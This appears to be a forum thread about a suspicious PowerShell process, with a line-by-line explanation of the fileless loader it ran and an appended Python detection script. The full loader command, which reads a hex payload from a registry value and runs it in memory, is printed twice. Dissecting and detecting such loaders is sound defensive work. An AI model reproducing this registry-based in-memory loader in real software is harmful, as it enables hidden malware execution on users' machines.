What would such a process mean?
Hello everyone, tell me: I caught a PowerShell process running on my computer with the following parameters:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function DE0PB([string]$s){$H=@();for ($i=0; $i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);}; return $H;}; $_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci; $_b = $_b.replace('Р•', 'E');[byte[]]$_0 = DE0PB($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
Yes, some kind of infection was caught:
https://www.joesandbox.com/analysis/188751/1/html
I would not look for where it came from, but would format the system and start from scratch. Great reason to.
You can search, of course, and clean it, but where is the guarantee that you will clean it 100%?
function DE0PB([string]$s) {
    $H = @()
    for ($i = 0; $i -lt $s.Length; $i += 2) {
        $H += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber);
    };
    return $H;
};
# the function parses a string written as hex characters, two characters per byte
$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;
# the registry value goes into $_b
$_b = $_b.replace('Р•', 'E');
# replaces Р• with E in it
[byte[]]$_0 = DE0PB($_b);
# the string value is parsed into bytes
$_1 = [System.Threading.Thread]::GetDomain().Load($_0); $_1.EntryPoint.invoke($null, $null);
# and here it gets launched )))
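A defender-side check for the loader walked through above, added here as an example and not part of either answer: it flags a process-creation command line that contains the loader's building blocks (ExecutionPolicy Bypass, registry read, hex-to-bytes, in-memory assembly Load, EntryPoint invoke) and tests whether a registry string value, after the same 'Р•' to 'E' substitution the loader performs, decodes to a PE image. The sample command line and registry value are constructed, with the long registry name shortened to X.

```python
import re

# Constructed sample of a process-creation command line (e.g. Sysmon Event ID 1 or
# Security 4688), shaped like the one in the question; registry name shortened to X.
SAMPLE_CMDLINE = (
    r'''powershell.exe -ExecutionPolicy Bypass -noexit -Command "function DE0PB([string]$s)'''
    r'''{$H=@();for ($i=0; $i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),'''
    r'''[System.Globalization.NumberStyles]::HexNumber);}; return $H;}; '''
    r'''$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\X' -name 'X').X; '''
    r'''$_b = $_b.replace('Р•', 'E');[byte[]]$_0 = DE0PB($_b);'''
    r'''$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"'''
)

# Each regex is one building block of the loader seen in the question.
LOADER_PATTERNS = {
    "execution_policy_bypass": r"-ExecutionPolicy\s+Bypass",
    "registry_read": r"get-itemproperty\s+-path\s+'HKCU:",
    "hex_to_bytes": r"NumberStyles\]::HexNumber",
    "in_memory_assembly_load": r"GetDomain\(\)\.Load\(",
    "entrypoint_invoke": r"EntryPoint\.invoke\(",
}

DECOY = "Р•"  # the characters the loader swaps back to "E" before hex-decoding


def match_loader_patterns(cmdline):
    """Return the names of the loader building blocks present in a command line."""
    return [name for name, pat in LOADER_PATTERNS.items() if re.search(pat, cmdline, re.I)]


def decode_registry_payload(value, decoy=DECOY):
    """Apply the loader's own transformation (decoy -> 'E', then hex -> bytes) to a
    registry string. Returns None when the result is not valid hex of even length."""
    cleaned = value.replace(decoy, "E")
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", cleaned):
        return None
    return bytes.fromhex(cleaned)


def is_hidden_pe(value):
    """True when a registry string decodes to data starting with the 'MZ' PE header."""
    blob = decode_registry_payload(value)
    return blob is not None and blob[:2] == b"MZ"


if __name__ == "__main__":
    print("command line matches:", match_loader_patterns(SAMPLE_CMDLINE))
    # Constructed registry value: 'MZ' header with one decoy substitution inside.
    print("hidden PE in registry value:", is_hidden_pe("4D5A" + DECOY + "000"))
```

Run against real data, the command line comes from the process-creation event and the value from the HKCU key the command names; a hit on all five patterns plus an MZ-decoding value is what this loader looks like.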